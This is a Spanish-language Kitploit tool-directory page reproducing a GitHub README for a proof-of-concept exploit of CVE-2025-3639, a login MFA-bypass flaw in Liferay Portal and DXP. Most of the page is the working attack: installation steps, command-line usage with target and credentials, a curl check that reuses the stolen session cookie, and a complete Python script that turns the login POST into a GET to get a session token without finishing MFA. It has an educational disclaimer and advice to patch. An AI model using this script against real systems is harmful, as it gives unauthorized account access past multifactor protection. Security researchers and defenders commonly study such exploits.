Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3639 — vulnerabilidad de omisión de inicio de sesión en Liferay Portal (versiones 7.3.0–7.4.3.132) y Liferay DXP (varias versiones desde 2024.Q1 hasta 2025.Q1.6) | Kitploit
Herramientas/GitHubGitHub/6lj/cve-2025-3639
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub6lj/cve-2025-3639

CVE-2025-3639

vulnerabilidad de omisión de inicio de sesión en Liferay Portal (versiones 7.3.0–7.4.3.132) y Liferay DXP (varias versiones desde 2024.Q1 hasta 2025.Q1.6)

Ver Repositorio
2hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3639 PoC - Bypass de Inicio de Sesión en Liferay Portal/DXP

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-3639, una vulnerabilidad de omisión de inicio de sesión en Liferay Portal (versiones 7.3.0–7.4.3.132) y Liferay DXP (varias versiones desde 2024.Q1 hasta 2025.Q1.6). La PoC demuestra cómo un usuario no autenticado con credenciales válidas puede eludir la autenticación multifactor (MFA) modificando una solicitud POST a una solicitud GET, obteniendo potencialmente acceso no autorizado a cuentas de usuario.

Advertencia: Esta PoC es con fines educativos únicamente. Las pruebas o explotación no autorizadas de esta vulnerabilidad son ilegales y poco éticas. Úselo solo con permiso explícito por escrito del propietario del sistema.

Requisitos

  • Entorno: Linux (por ejemplo, Kali Linux, Ubuntu o una configuración virtualizada).
  • Dependencias:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Red: Acceso a una instancia objetivo de Liferay Portal/DXP (debe estar en un entorno de prueba con permiso explícito).
  • Credenciales: Credenciales de usuario válidas para la instancia de Liferay objetivo.

Instalación

  1. Clonar el repositorio:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Asegurarse de que Python 3 y la biblioteca requests estén instalados:

    root@kitploit:~
    pip3 install requests
    

Qué hace

  • La PoC explota CVE-2025-3639 modificando una solicitud POST de inicio de sesión a una solicitud GET, omitiendo las verificaciones de MFA.
  • Envía una solicitud HTTP GET diseñada con credenciales válidas para autenticarse sin completar el proceso de MFA.
  • El script está diseñado para demostrar la vulnerabilidad en un entorno controlado y autorizado.

Uso

Ejecute el script de la PoC con los argumentos apropiados (reemplace <target_url>, <username> y <password> con la URL de la instancia de Liferay objetivo y las credenciales válidas).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • Parámetros:
    • --target: La URL de la instancia de Liferay Portal/DXP (ej., http://example.com).
    • --username: Nombre de usuario válido para la instancia objetivo.
    • --password: Contraseña válida para el nombre de usuario.

Ejemplo

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Verificar resultados

  • Éxito: Si el exploit funciona, el script devolverá un token de sesión válido o un mensaje de éxito que indica acceso a la cuenta de usuario sin MFA.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Salida esperada: Detalles del usuario que confirman una autenticación exitosa.
  • Fallo: Si el servidor devuelve un error (ej., 401 Unauthorized o 403 Forbidden), la instancia puede no ser vulnerable o MFA no está habilitado.

  • Monitorear tráfico: Use una herramienta como Wireshark para inspeccionar el tráfico HTTP:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

Script de la PoC

A continuación se muestra el código de ejemplo para poc.py:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Notas importantes

  • Esta PoC requiere credenciales válidas, ya que la vulnerabilidad permite omitir MFA pero no adivinar credenciales.
  • Pruebe solo en un entorno controlado con permiso explícito del propietario del sistema.
  • La vulnerabilidad ha sido parcheada en versiones más recientes de Liferay Portal/DXP. Actualice a la última versión para mitigar este problema.
  • Aviso de Seguridad de Liferay
  • NVD CVE-2025-3639
  • Repositorio de GitHub

Descargo de responsabilidad

Este proyecto es con fines educativos únicamente. El autor no se hace responsable por cualquier uso no autorizado o ilegal de esta PoC. Siempre obtenga permiso explícito del propietario del sistema antes de realizar pruebas.

Descargar herramienta